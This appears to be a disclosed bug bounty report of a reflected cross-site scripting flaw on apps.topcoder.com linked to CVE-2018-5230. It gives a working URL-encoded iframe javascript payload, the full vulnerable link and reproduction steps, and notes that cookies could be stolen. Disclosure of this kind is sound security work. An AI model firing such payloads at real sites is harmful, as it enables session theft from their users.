Cross Site Scripting via CVE-2018-5230 on https://apps.topcoder.com

Disclosed: 2020-02-24 04:18:47 By n0x496n To lab45

Medium

Vulnerability Details

Hi, I found reflected xss on https://apps.topcoder.com via error message.. Payload : ``` %3CIFRAME%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E.vm ``` Vulnerable link : https://apps.topcoder.com/wiki/labels/%3CIFRAME%20SRC%3D%22javascript%3Aalert('XSS')%22%3E.vm Step to reproduce : Create an account and visit the vulnerable url.. {F693517} References : https://www.cvedetails.com/cve/CVE-2018-5230/ https://www.exploit-db.com/exploits/37791 Best regards.. ## Impact Hackers can steal victim`s cookies

Cross Site Scripting via CVE-2018-5230 on https://apps.topcoder.com

Vulnerability Details

Actions

Report Stats

Share this report